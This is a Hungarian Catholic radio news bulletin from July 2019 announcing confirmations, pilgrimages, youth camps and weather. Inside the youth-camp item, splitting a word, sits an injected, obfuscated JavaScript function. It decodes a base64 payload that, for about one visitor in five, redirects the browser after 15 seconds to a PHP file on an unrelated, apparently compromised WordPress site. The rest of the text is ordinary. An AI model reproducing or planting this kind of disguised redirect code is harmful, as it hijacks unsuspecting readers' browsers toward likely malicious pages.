2019. július 4. – Hírek és programajánló

H Í R E K   D É L B E N

Bérmálások a hétvégén
A nagyváradi egyházmegyében július 7-én vasárnap, a délelőtt 10 órakor kezdődő szentmisén Böcskei László megyéspüspök 26 fiatalnak szolgáltatja ki a bérmálás szentségét a monospetri plébániatemplomban. Felkészítésüket Pitó Lajos plébános végezte.
Szintén vasárnap, délután 4 órakor a zilahi plébániatemplomban 13 fiatal részesül a keresztény nagykorúság szentségében. Felkészítésüket Sővér István plébános végezte.
A temesvári egyházmegyében július 8-án, vasárnap Pál József-Csaba megyés püspök a máriaradnai kegytemplomban 13 bérmálásra felkészült fiatalnak szolgáltatja ki a második szentséget.

Templombúcsú Sólyomkőváron
Július 7-én, vasárnap a Szent Cirill és Szent Metód tiszteletére szentelt plébániatemplom búcsúünnepét tartják Sólyomkőváron. A 13 órakor kezdődő szentmise főcelebránsa és szónoka Mlinárcsik János, a nagyváradi szlovák személyi plébánia lelkésze lesz.

Elsőszombat Csíksomlyón
A csíksomlyói kegytemplomban július 6-án tartják az elsőszombati ünnepélyes Mária köszöntőt. A program délután hat órától az engesztelő imaórával kezdődik, majd hét órától lesz a szentmise. Ezt követően a rózsafüzért imádkozzák, majd gyertyás körmenetben viszik a Szűzanya kegyszobrának másolatát a templom előtti téren. A Mária köszöntőre autóbusz indul Székelyudvarhelyről, a Márton Áron térről szombaton délután fél 4-kor. Jelentkezni Máyai Erzsébetnél lehet a 0740-617687-es telefonszámon. Mindazok, akik nem tudnak elzarándokolni a kegyhelyre, a szentmisébe bekapcsolódhatnak a csiksomlyo.ro honlapon követhető élő közvetítés révén vagy rádiónk hullámhosszán. A közvetítés hat órakor kezdődik.

Az erdélyi ferencesek nyári táborai
A hagyományokhoz híven, idén is megszervezik a ferences biciklitúrát, az ifjúsági zarándoklatot, a fiúcsapat-, és a foci tábort is. Érdeklődni lehet a frtibi@gmail.com e-mail címen, vagy a 0741-940171 telefonszámon. A programokról bővebb információt a romkat.ro oldalon találnak.

Zarándoklat a Szentföldre
Fábián László, kolozsvár-györgyfalvi plébános vezetésével zarándoklatot szerveznek a szentföldre november 14-21 között. Az utazás ára: 880 euró. Jelentkezni a 0744-599726-os telefonszámon lehet.

Katolikus ifjúsági tábor
Az Emmausz egyesület és a Nagyváradi Római Katolikus Püspökség közös szervezésében július 16-21, 23-28 és augusztus 27-szeptember 1 között kalfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andtáborokat szervez Körösréven. A kirándulás, a játék és az alapvető túlélési technikák elsajátítása mellett, minden nap lesz egy rövid lelki program is. 12-18 év közötti fiatalok jelentkezését várják Erdély egész területéről. A székelyföldi érdeklődők Gergen Andreánál a 0748-092421- es telefonszámon jelentkezhetnek, a Nagyvárad környéki fiatalok pedig Majoros Tibornál a 0742-507373 számon. Bővebb információk a www.emmausz.ro oldalon.

Zarándoklat Máriaradnára
A Kármel-hegyi Boldogasszony napján, július 16-án, kedden A Temesvári Római Katolikus püspökség zarándoklatot szervez a máriaradnai kegytemplomhoz. A 11 órakor kezdődő ünnepi szentmise főcelebránsa Pál József Csaba megyéspüspök. A liturgiát követően kerül sor Xantus Géza neves erdélyi festőművész tárlatának megnyitójára.

Családos hétvége
A Katolikus Magyar Bibliatársulat július 12-14. között a kisgyerekes családok számára tábort szervez a gyimesfelsőloki Bagolyvár panzióban. Az Ige fényében eltöltött családi nyaralás jó alkalom a házastársi kapcsolat elmélyítésére, melyben Tamás Barna előadásai segítenek a résztvevőknek. Jelentkezni lehet Dimény Beátánál a 0729-834004 telefonszámon vagy a beata.dimeny@gmail.com. e-mail címen.

CSIT 2019
Elindult a regisztráció az idei csíksomlyói ifjúsági találkozóra, melyet augusztus 13-17. között tartanak. Várják a 14 és 30 év közötti fiatalok jelentkezését a csit.fif.ma/jelentkezés oldalon. Idén is számítani lehet élményalapú, dinamikus előadásokra, mély beszélgetésekre, színes szabadidős foglalkozásokra, szentségimádásra, ifjúsági szentmisékre. A szállásokon a helyek száma korlátozott. A jelentkezés az 50 lej előleg kifizetésével válik véglegessé. Aki július 20-ig regisztrál,egy pólót kap ajándékba.

Időjárás: Csütörtökön az ország északi felén több, délen kevesebb napsütés lesz. Délnyugaton, délen főként a nap első felében esőre, záporra, egy-egy zivatarra készülhetünk. Az északnyugati szél északon és keleten élénk lehet. Napközben 26-31 fokra számíthatunk.

H Í R E K   R E G G E L

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében a mai nap folyamán Szováta filiájában, Ilyésmezőn, a Jézus Szentséges Szíve templomban tartanak örökös szentségimádási napot. Szánjunk időt a szentséglátogatásra és használjuk az egyház által felkínált lehetőségeket, melyek erősítik és elmélyítik Krisztussal való személyes kapcsolatunkat.

Első csütörtöki szentségimádások
Ma tartjuk a szokásos csendes szentségimádást rádiónk stúdiójának kápolnájában. Reggel fél 9-től szentmise lesz, majd délután 3 óráig várjuk az imádkozni és engesztelni vágyókat. Szentségimádást tartanak ma az alsódobói Isteni Irgalmasság kápolnában is. Délután 2 órakor elimádkozzák az örvendetes, a világosság, a fájdalmas és a dicsőséges rózsafüzéreket, majd az isteni irgalmasság rózsafüzérét is. 4 órakor szentmisét mutatnak be, amely szentségi áldással fejeződik be. Az imaalkalom alatt gyónási lehetőség lesz.

Bérmálások a hétvégén
A nagyváradi egyházmegyében július 7-én vasárnap, a délelőtt 10 órakor kezdődő szentmisén Böcskei László megyéspüspök 26 fiatalnak szolgáltatja ki a bérmálás szentségét a monospetri plébániatemplomban. Felkészítésüket Pitó Lajos plébános végezte.
Szintén vasárnap, délután 4 órakor a zilahi plébániatemplomban 13 fiatal részesül a keresztény nagykorúság szentségében. Felkészítésüket Sővér István plébános végezte.
A temesvári egyházmegyében július 8-án, vasárnap Pál József-Csaba megyés püspök a máriaradnai kegytemplomban 13 bérmálásra felkészült fiatalnak szolgáltatja ki a második szentséget.

Templombúcsú Sólyomkőváron
Július 7-én, vasárnap a Szent Cirill és Szent Metód tiszteletére szentelt plébániatemplom búcsúünnepét tartják Sólyomkőváron. A 13 órakor kezdődő szentmise főcelebránsa és szónoka Mlinárcsik János, a nagyváradi szlovák személyi plébánia lelkésze lesz.

Nyári hangversenysorozat
Az Egyházzene – Kolozsvár egyesület szervezésében nyári  hangversenysorozatot tartanak a kolozsvári Piarista (Szentháromság) templomban, július-augusztus hónap folyamán minden pénteken.
Az első koncert holnap este 7 órától lesz, ahol fellép a kolozsvári Intono Kvartett kamara együttes.

Lelkigyakorlat Hargitafürdőn
Július 19-21 között, Jézus Krisztus a te szabadítód címmel, lelkigyakorlat lesz a hargitafürdői kápolnában, Dr. Gál Péter atya vezetésével. A lelkigyakorlat pénteken délután 5 órakor kezdődik. A három nap alatt arról lesz szó, hogy Jézus Krisztus megszabadít az okkult tévelygésektől, a hamis másolatoktól, a családi és egyéni múlt terheitől, hogy felejtsük ami mögöttünk van, és az elöttünk lévők után rugaszkodjunk.
A lelkigyakorlatra regisztrálni nem kell, érdeklődni lehet minden szerda este a Csíkszeredai Püspöki Szent József kápolnában 18-19 óra között, illetve a lelkigyakorlatot tartó atyánál a 0036-307255519 telefonszámon.
Távolról jövőknek szállást étkezést ad a Hargitafürdői Csíki panzió, jelentkezni lehet a 0757-059 647 telefonszámon.

Zarándoklat Altöttingbe
Altötting Bajorország egyik legismertebb Mária-kegyhelye, ahová a Duna menti római katolikus svábok immár 60 éve minden július elején elzarándokolnak. A meghurcoltatás nehéz időszakában a svábok megfogadták: minden évben elmennek Altöttingbe, hogy sorsuk jobbra fordulásáért a Szűzanyához fohászkodjanak.
Az idei zarándoklat július 13-án este 8 órakor szentmisével kezdődik a Szent Anna bazilikában, melyet Pál József Csaba megyéspüspök mutat be. Másnap, július 14-én a program délelőtt fél 10 órakor a résztvevő zarándokok körmentével kezdődik, 10 órakor Dr. Robert Zollitsch freiburgi ny. érsek mutat be szentmisét, koncelebrál Pál József Csaba temesvári főpásztor és dr. Varga Lajos váci segédpüspök.

Ezer Székely Leány Napja
1931-ben először hívták össze az ezer székely leányt Csíksomlyóra, a szervezők jól tudták, hogy Székelyföld sokkal több, mint Csík, ám a körülmények arra korlátozták őket, hogy a környékre szorítkozzanak, mintegy példamutatásul mindenkinek. Az új kezdet óta eltelt három évtized és ez alatt az Ezer Székely Leány Napja igazi ünneppé növekedett. Ma már nemcsak helyiek vesznek részt rajta, hanem Székelyföld egész területéről érkeznek a lányok, asszonyok.
Az idei eseménysorozat kibővült, hiszen már a pénteki napon is a néptáncé és a népzenéé lesz a főszerep. Július 5-én, 19.00 órától Csikszeredában, a Szabadság térre várnak minden érdeklődőt. Szombaton, július 6-án az egész napos rendezvénysorozat reggel 8 órakor kezdődik.

Időjárás: Kedd déltől csütörtök reggelig szinte az egész országra vonatkozó figyelmeztetés lesz érvényben a kánikula, illetve a légköri instabilitás miatt.
Csütörtökön az ország északi felén több, délen kevesebb napsütés lesz. Délnyugaton, délen főként a nap első felében esőre, záporra, egy-egy zivatarra készülhetünk. Az északnyugati szél északon és keleten élénk lehet. Napközben 26-31 fokra számíthatunk.

MRE - Hírszolgálat, 2019. július 4.

About the author

majoros gabriella